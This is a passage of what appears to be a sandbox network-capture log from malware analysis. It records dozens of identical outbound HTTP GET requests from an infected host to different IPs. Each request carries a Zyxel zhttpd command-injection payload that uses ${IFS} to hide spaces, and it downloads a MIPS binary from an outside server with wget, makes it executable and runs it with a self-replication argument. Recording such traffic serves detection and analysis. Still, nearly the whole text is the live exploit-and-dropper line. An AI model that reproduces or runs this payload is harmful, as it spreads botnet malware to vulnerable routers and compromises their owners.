                                    Jan 13, 2024 19:02:28.035618067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2830192.168.2.13569465.68.96.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035696983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2831192.168.2.135227890.183.34.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035733938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2832192.168.2.1338068186.238.204.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035774946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2833192.168.2.1342914191.70.75.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035832882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2834192.168.2.1337146100.33.109.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035948038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2835192.168.2.135175431.52.20.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036011934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2836192.168.2.1332840135.147.90.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036082029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2837192.168.2.1343282198.48.231.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036119938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2838192.168.2.1343278196.19.239.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036194086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2839192.168.2.1354152196.2.126.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036258936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2840192.168.2.1345588220.63.233.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036294937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2841192.168.2.135292865.106.18.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036365032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2842192.168.2.1345786147.71.159.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036451101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2843192.168.2.1347972149.104.158.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036499023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2844192.168.2.135844290.164.135.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036577940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2845192.168.2.135847071.118.97.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036624908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2846192.168.2.135880420.219.87.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036709070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2847192.168.2.1359330157.15.238.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036729097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2848192.168.2.134027025.72.180.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036792040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2849192.168.2.13538088.80.64.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036835909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2850192.168.2.135483037.152.67.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036890984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2851192.168.2.1344222177.235.14.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.036958933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2852192.168.2.133301298.82.54.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037036896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2853192.168.2.1335782186.73.107.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037101030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2854192.168.2.135037458.59.250.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037153006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2855192.168.2.1343636113.3.177.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037241936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2856192.168.2.1343192144.221.171.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037313938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2857192.168.2.1358788201.63.217.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037372112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2858192.168.2.1351790185.41.1.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037405968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2859192.168.2.135424863.156.119.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037492990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2860192.168.2.134953498.176.39.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037566900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2861192.168.2.134222081.238.243.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037585020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2862192.168.2.134311819.177.255.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037642002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2863192.168.2.1360612217.103.227.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037702084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2864192.168.2.1360380204.123.252.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037744999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2865192.168.2.135497651.190.83.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037818909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2866192.168.2.1344796185.225.221.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037894964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2867192.168.2.1355226110.132.197.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037954092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2868192.168.2.1339656130.82.184.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.037991047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2869192.168.2.134199259.158.213.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038067102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2870192.168.2.1358812177.243.248.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038156033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2871192.168.2.136033841.101.0.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038187981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2872192.168.2.133698659.131.14.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038250923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2873192.168.2.1333582134.201.7.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038301945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2874192.168.2.133558227.29.188.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038372040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2875192.168.2.1356526112.129.245.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038446903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2876192.168.2.1347430118.217.184.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038476944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2877192.168.2.1336116149.224.160.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038520098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2878192.168.2.1344370118.43.90.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038590908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2879192.168.2.1346062203.5.186.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038669109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2880192.168.2.1358508133.104.28.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038687944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2881192.168.2.134511094.255.86.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038738012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2882192.168.2.1333184222.161.11.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038778067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2883192.168.2.1336416174.129.46.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038830996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2884192.168.2.134916872.60.248.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038888931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2885192.168.2.1341570109.179.188.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.038940907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2886192.168.2.1336418180.107.227.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039001942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2887192.168.2.1336378167.61.181.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039057016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2888192.168.2.1350772119.121.94.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039108038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2889192.168.2.1343422100.137.164.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039191961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2890192.168.2.135400885.202.139.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039222956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2891192.168.2.1344338201.234.123.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.039287090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2892192.168.2.1354858142.170.241.113443
                                    TimestampBytes transferredDirectionData
